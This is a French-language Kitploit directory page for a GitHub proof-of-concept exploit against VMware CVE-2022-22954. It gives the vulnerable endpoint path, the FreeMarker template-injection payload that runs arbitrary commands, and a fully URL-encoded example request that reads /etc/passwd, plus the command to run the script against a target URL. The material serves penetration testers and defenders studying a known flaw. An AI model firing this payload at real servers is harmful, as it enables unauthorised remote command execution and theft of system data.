Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
VMware-CVE-2022-22954-Command-Injector — Preuve de concept pour l'exploitation de la CVE-2022-22954 de VMware | Kitploit
Outils/GitHubGitHub/emilyastranova/vmware-cve-2022-22954-command-injector
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubemilyastranova/vmware-cve-2022-22954-command-injector

VMware-CVE-2022-22954-Command-Injector

Preuve de concept pour l'exploitation de la CVE-2022-22954 de VMware

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
11il y a 4 ansPas encore vérifié

VMware-CVE-2022-22954-Command-Injector

Preuve de concept pour l'exploitation de VMware CVE-2022-22954

Comment ça marche

Ce simple script Python envoie une requête GET à l'URL spécifiée, complétée par /catalog-portal/ui/oauth/verify?error=&deviceUdid= puis suivie d'une version encodée en URL de cette chaîne :

root@kitploit:~
${"freemarker.template.utility.Execute"?new()("command")}

Par exemple, une sortie pour « cat /etc/passwd » ressemblerait à ceci : {host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

Instructions

root@kitploit:~
python3 exploit.py <URL>

Références

  • https://github.com/sherlocksecurity/VMware-CVE-2022-22954
Télécharger l’outil